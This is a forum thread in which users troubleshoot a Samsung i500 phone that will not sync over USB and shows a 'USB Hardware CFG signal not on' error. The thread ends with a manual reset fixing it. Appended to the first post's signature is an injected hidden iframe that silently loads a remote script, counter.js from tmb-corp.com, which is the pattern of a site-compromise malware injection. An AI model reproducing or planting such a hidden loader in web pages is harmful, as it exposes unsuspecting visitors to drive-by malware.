+ Reply to Thread

USB/sync issues....

Hi,

When I try to sync I get a message saying the usb device is not recognized, so there is an unknown device. When I click on the properties of that device it says no drivers are installed, but when I try to update the drivers it says there is nothing to update. Also, when I open Device Manager after I've re-installed everything and look at the USB list, it lists the Samsung USB Device, and under Properties it says all is fine but when I try to sync it becomes an Unknown Device. Then I get this error on the phone itself:

"USBHwrInit.c, Line:506, USB Hardware CFG signal not on"

and I have to reset. If Device Manager is still open I can see it change from Unknown Device back to Samsung USB....

I've tried uninstalling and re-installing everything several times but I still have the same problem.

Any help/info would be really appreciated.

Thanks!

Roy<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Roy,

See the message thread from a few days ago on this same subject :

Hotsync Issues

Since the Samsung device is recognized in your USB devices list, you probably have the Windows installation correct. It appears that the i500's hotsync cradle/cable is very fussy - read the thread for some other ideas.
    Joel

Thanks Joel, but I should have mentioned that I tried many if not all suggestions listed in other threads and still get nothing. I'm beginning to think it's a faulty cradle that I need to replace. When I first got the phone a few weeks ago it worked fine....this nonsense only started happening the other day.

Roy

As I reported in the other thread,if you are using XP, try using Intellisync instead of Pocket Mirror

mike
    michaelb92

I wasn't syncing with Outlook so I didn't use Pocket Mirror...

After talking with a tech at PCS for a while I was advised to replace the cradle. This was a little tricky seeing as the stores don't have many extra, but I got lucky and was helped by someone who eventually took a brand new one from the box for me.
    So if anyone encounters the same problems as me, save some time and get a new cradle....

Sorry for resurrecting an old thread, but I couldn't find any other threads or anything else on the web to help me. I'm getting the same error when I try to sync my i500. I've used a co-worker's cradle, tried different USB ports on the PC, and reloaded the drivers from the CD. I still get the same

"UsbHwrInit.c, Line:506, USB hardware CFG signal not on"

error whenever I sync. I also performed all the steps in the related post at

Hotsync Issues

I've been able to sync dozens of times prior to last week. Nothing on my PC has changed (XP Pro, SP2), hardware or software-wise. Any other ideas before I go to Sprint and see if this phone needs to be repaired?

Sorry never seen that error before. However I would suggest both rebooting the PC, if you haven't done that yet, and probably more importantly, trying another PC/laptop. I seriously doubt that Sprint will give you much joy, unless they have a spare i500 on hand to give you. So you really want to be sure that it isn't some problem with your PC. Do other USB peripherals work fine on your PC ?

If the error crashed your device (i.e. you got a message where you pushed a screen button labelled reset) you will need to manually reset again. I had the same/similar error and always thought that since I was resetting via that dialogue box that I was resetting the device. I found that you still need to actually reset using the reset tool in order to clear the problem. other than that, I have no advice (other than hold out for a new Palm based device)

Quote Originally Posted by deibelsan View Post
    If the error crashed your device (i.e. you got a message where you pushed a screen button labelled reset) you will need to manually reset again. I had the same/similar error and always thought that since I was resetting via that dialogue box that I was resetting the device. I found that you still need to actually reset using the reset tool in order to clear the problem. other than that, I have no advice (other than hold out for a new Palm based device)
    Thanks Deibelsan! Resetting the phone using the reset tool fixed my problem. I learned something new today. I appreciate your help.